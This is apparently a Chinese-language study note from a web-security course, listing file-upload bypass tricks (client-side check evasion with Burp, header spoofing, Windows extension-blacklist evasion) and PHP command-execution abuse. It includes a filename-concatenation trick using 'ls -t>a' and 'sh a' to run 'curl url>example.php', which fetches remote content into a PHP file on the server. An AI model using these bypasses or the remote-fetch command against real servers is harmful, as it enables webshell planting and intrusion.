DAY2

一 文件上传

1.未做任何过滤
直接上传php文件即可()

2.前端绕过(前端javascript验证绕过)
burp抓包修改后缀名
3.幻数限制(文件头限制)
在php文件前加判定的头名称
4.黑名单限制(win系统下)
可通过win系统下自动将文件后缀名中的.和空格进行删除,来绕过。

二 代码命令执行漏洞

1.命令执行漏洞
调用system函数,可以执行Ubuntu中的命令(eg:ls/whoami)


图片1.png

2.案例(执行:curl url>eample.php)——此案例需将环境搭建在Ubuntu系统中


image.png

可以用名称拼接的方式
 ls -t(以时间传输的方式排列当前文件夹下的文件)
 ls -t>a(将文件名拼接成一个命令,放入a文件中)
 sh a(执行a命令)
 (之后可以查看我们从执行的curl url>emample.php命令后example.php文件)    

你可能感兴趣的:(DAY2)